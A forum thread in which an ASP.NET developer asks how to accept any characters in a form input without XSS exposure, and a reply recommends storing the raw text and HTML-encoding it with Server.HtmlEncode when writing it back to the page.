locked
html and script tags in forms encoding etc.. RRS feed

  • Question

  • User1925756237 posted

    I have a form where any characters are acceptable input. Obviously this leaves me vulnerable to XSS attacks. I know there are a few options such as making sure validaterequest is set to true on my asp.net pages, and/or using the html encode utility. If I do this however I wont be able to get the form to submit since I get the "a dangerous request...." error due to the characters I am allowing to be input.  The problem I have is I dont neccesairly want encoded data input into my MSSQL database for a variety of reasons. The main reason is displaying the data and or decoding the data through ad hocs and SRS reports is not easy.

    My question is what is the best way to handle the above situation?

    Wednesday, April 3, 2013 1:52 PM

Answers

  • User-1241139641 posted

    It won't show as encoded to the person viewing the page. It will display special characters like '<' and '>' as is.

    Response.Write(Server.HtmlEncode("<b>This is HTML!<b>")) //produces <b>This is HTML!</b> on the page.



    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Friday, April 5, 2013 12:07 PM

All replies

  • User-1241139641 posted

    If you need to turn ValidateRequest off then what you need to do is 'HtmlEncode' the string when you return the value back to browser. This will ensure that any script or html is displayed as text not processed by the browser.

    But again, this is not recommneded unless you have to: http://msdn.microsoft.com/en-us/library/system.web.ui.page.enableeventvalidation.aspx

    Friday, April 5, 2013 9:00 AM
  • User1925756237 posted

    I dont think that will work, because lets say i accept character such as < or & etc. If i save to database as those characters un-encoded then encode them to the screen they will see a bunch of encoding characters and not the original text.

    Friday, April 5, 2013 11:46 AM
  • User-1241139641 posted

    It won't show as encoded to the person viewing the page. It will display special characters like '<' and '>' as is.

    Response.Write(Server.HtmlEncode("<b>This is HTML!<b>")) //produces <b>This is HTML!</b> on the page.



    • Marked as answer by Anonymous Thursday, October 7, 2021 12:00 AM
    Friday, April 5, 2013 12:07 PM